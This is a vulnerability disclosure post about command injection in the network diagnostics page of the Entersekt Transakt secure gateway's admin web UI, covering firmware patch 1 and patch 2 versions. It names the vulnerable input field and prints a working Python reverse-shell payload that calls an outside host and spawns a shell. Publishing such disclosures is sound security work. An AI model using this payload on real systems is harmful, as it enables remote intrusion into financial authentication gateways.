Entersekt Transakt secure gateway - Remote Code Execution via OpenSSL diagnostics in GA 23.1-4824 patch 1 and GA 23.1-4825 patch 2
The product “Transakt” from Entersekt is known / used in financial market latest since European PSD2 as 2-FA authentication. There are whitelabel smartphone apps from different financial institutions play store search for ‘com.entersekt.authapp’
They may use the “secure gateway” hardware as on-premise installation.
Login into Web UI as admin, go to main tab Diagnostics, select sub tab Network Diagnostics.
For this OpenSSL Connect check, the input field needs to end with a :port in input field to be valid. Ok ;-)
Since the “Target server” input field is not sanitized, we can start a reverse shell by calling [Start OpenSSL Connect].
Internally the command is executed
;sh -c `echo | openssl s_client -connect <payload>
Payload to trigger reverse shell and to fullfill the :port at the end
; /usr/bin/python3 -c 'a=__import__;s=a("socket");o=a("os").dup2;p=a("pty").spawn;c=s.socket(s.AF_INET,s.SOCK_STREAM);c.connect(("10.0.0.1",4242));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")' ; :443
We are connected from the system with user tomcat :-)
Firmware GA 23.1-4824 patch 1 introduced the possibility of network diagnostics via an OpenSSL connect and opened the door for this Remote Code Execution.
Months later I found this vulnerability and reported it. Entersekt confirmed and stated “already fixed with patch 3”.
Firmware GA 23.1-4825 patch 2 was vulnerable too.
Firmware GA 23.1-4826 patch 3 closed the RCE possibility, but without any “security fix” reference nor CVE entry in changelog.
The access should be possible only from internal network behind a DMZ and as user with admin role.
But why do I write this post? Maybe I think “Be honest about known vulnerabilities”, because you will not find any advisory or CVE about this.
Disclaimer
The information provided is released “as is” without warranty of any kind. The publisher disclaims all warranties, either express or implied, including all warranties of merchantability. No responsibility is taken for the correctness of this information. In no event shall the publisher be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if the publisher has been advised of the possibility of such damages.
The contents of this advisory are copyright (c) 2024 by psytester and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.